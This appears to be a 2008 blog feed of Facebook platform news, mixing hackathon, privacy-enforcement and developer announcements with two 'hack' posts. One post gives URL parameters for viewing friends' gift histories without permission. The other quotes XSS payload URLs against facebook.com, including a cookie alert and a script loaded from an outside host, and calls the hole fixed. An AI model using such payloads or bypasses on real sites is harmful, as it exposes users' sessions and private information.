Facebook News: Hackathon


/

If you like late-night Chinese food, Red Bull, Office Ripstik races and Rock Band Jam sessions, this f8 hackathon is just for you.

You might also contribute to build the facebook platform of tomorrow:

“Hackathon is an all-night-long hack session that gives every Facebook engineer a chance to work on that awesome feature they’ve been meaning to build for so long. Many of the cool features that you see on the site today were either built during or were started during a Facebook Hackathon.”

says Wayne Chang.

Like last year’s f8:

“you will have the chance focus on hacking the new platform interfaces like the Profile Publisher, App Tabs, and Feed Stories.”

You will also be able to follow two workshop sessions: “App building 101″ and “Taking yor application global”.

Read more…

Facebook News: Protecting User Privacy by Example: Top Friends suspended

 facebook_news_top_friends.jpg

Facebook published on the 27th of June an article about “Building Trust and Protecting User Privacy” because “Privacy is at the core of Facebook”.

Because ” Facebook work to help clarify standards and maintain user trust” in applications available on Facebook, they recently suspended “Top Friends“, an application used by millions of users, one of the most popular applications on Facebook.

According the Facebook:

“This application violated user privacy by displaying some profile data to people who should not otherwise have been able to see the information. Though the application developer insists that this violation was not intentional, the seriousness of the violation required us to take immediate action.”

And they added:

“This situation demonstrates the importance for continued vigilance on our part and the part of developers who build applications on Facebook Platform.”

In the coming weeks, Facebook promise to increase their efforts  to educate the developers community about their specific policies and the polities and programs developers need to put in place in order to uphold the guiding principles of the platform.

So developers please be responsible before Facebook makes an example with your application. :-)

Source page

Facebook News: Facebook in Number

facebook_f8_2.jpg

13 months after the inaugural f8 facebook even (it was on the 24th of May 2007), following are some numbers about the facebook ecosystem:

- 400.000+ Developers (in more than 160 different countries)

-  24.000+ Applications in the Directory

- 80.000.000 active Users

And, as you can see on the Alexa graph above and in term of percent, for a few weeks now, the facebook daily reach is higher then the myspace daily reach.

For information, the next f8 event will be held in San Francisco on the 23rd of July.

For more information read “f8 ‘08 is coming“.

Facebook Hack: How to See Things From Friends You Shouldn’t

facebook_hack_free_gifts.jpg

This little hack will show you how to see some information concerning your friends that you should not have direct access to.

In this little hack sample, I will show you how to get access to any free gifts, and the messages associated to them, of your friends.

You just need to get the user ID of the friend you want to get some more information.

To get the user ID and if you don’t know what it is or how to do it, just follow the instructions I gave in this previous article:

http://www.tools4facebook.com/2008/03/04/facebook-hack-how-to-see-tagged-photos-from-anyone-on-facebook/

When you have the user ID, let’s suppose it is 123456789, you just need to replace it in one of the following url and to navigate to this page.

http://apps.facebook.com/freegifts/?from=123456789

http://apps.facebook.com/freegifts/?to=123456789

Voilà! It was not so difficult, was it?

So, now that you know it is possible for your friends to see the history of all you received and sent gift, just act in consequence.

Facebook News: Experience Applications Without the need to install it

facebook_news_streamlining_application_authorisation.jpg

Still a week ago, if you wanted to test a facbook application you had to install it and let it access to personal information.

Now… you still have to let the application access to personal information but, after a few tests, if you don’t like the application you don’t need to edit your profile settings to remove it anymore. Indeed, facebook developers have added a “require_login” option.

Here is what Pete Bratach said on the 3 th of May:

“To reduce user friction when encountering a new application, we’re streamlining the way users authorize applications when they first encounter them. We’re doing this by recommending that you use require_login instead of require_add when the user first interacts with your application. By doing so, we believe users will be encouraged to explore your applications more and with less hesitation. As users engage with your application, they can access additional features and integrate your application deeper into their profiles when it makes sense within the application user experience.”

Read more…

Facebook News: a Canadian Law Clinic Files Complaint Against Facebook Privacy

facebook_news_privacy_complains.jpg

According to the SANS newsBites from this 3rd of June:

“The Canadian Internet Policy and Public Interest Clinic (CIPPIC) has filed a complaint alleging that the social networking site Facebook violated numerous aspects of the Canadian Personal Information Protection and Electronic Documents Act. The complaint alleges that Facebook failed to let users know how their information is shared with third parties and failed to obtain permission to disclose information.”

Facebook maintains that the complaint missed the mark, as nearly all Facebook data are willingly shared by users. Facebook has said it:

“will continue ongoing efforts to educate users and the public around privacy controls on Facebook.”

Read more…

Facebook News: Google’s “Friends Connect” suspended to Maintain User Privacy.

facebook_news_user_privacy.jpg

Facebook as decided to suspend applications like Google’s Friends Connect and MySpace’s Data Availability “to access to Facebook user information until it comes into compliance” announced Charlie Cheever on this 15 of May.

Charlie also added:

“We think MySpace’s Data Availability, Google Friend Connect, and Facebook Connect can be part of a great movement in the industry to give users a better and safer experience online, while respecting user privacy. We look forward to working with our developer community and everyone else in the industry to help all of our users take their information, and their privacy, with them wherever they go.”

Read more…

Facebook Hack: XSS Vulnerability (fixed on the 23/05/2008)

facebook_hack_xss_vulnerability.jpg

This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.

xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.

Redirection sample:

http://www.xssed.com/mirror/34274/

or

Insertion in a hidden iframe:

http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

According to Dimitris Pagkalos from xssed.com:

“I’m quite sure there are more cross-site scripting issues on Facebook. It is only a matter of time for the next one to be discovered by a security conscious individual.”

Read more…

Facebook News: The Improved Profile - Part IV

facebook_improvement_4.jpg

Facebook development is still in ebullition.

After the previous announcement of Facebook profile improvements in February, some of these improvements where confirmed last week.

These confirmed improvements concern:

1/ New feed stories: feed tab is front-and-center on users’ profiles (feed stories is going to continue to be a primary way users express themselves),  three sizes of stories (one line, short, and full), short stories will use templates, full stories will use FBML.

2/ Publisher: it allows users to add content such as text or photos, or rich content from any application such as music, videos, images, links, ….

3/ Application tabs: By default, there will be tabs on the user profile (Feed, Wall, Info, Photos, “Boxes). Users can add as many application tabs as they want (but up to 6 tabls can appear).

4/ Profile boxes: Existing wide and narrow profile boxes will now appear on a new Boxes tab (of 250 pixels in height) that every user can enable/disable on their profile.

5/ Application info sections: this new Info tab will allow users to express themselves in a more structured way than before.

Read more…

Facebook Developers news: No More Support For the Official Java Client Library.

Since yesterday, Facebook does not support the official JCL anymore.

James Leszczenski wrote:

“…,there has a great deal of enthusiasm regarding Platform application development in a huge array of programming languages, resulting in the creation of numerous unofficial client libraries.”

and “To this end, we have decided to discontinue support for our official Java client library, and rely on the existing community-driven libraries to fill this gap.”

Read more…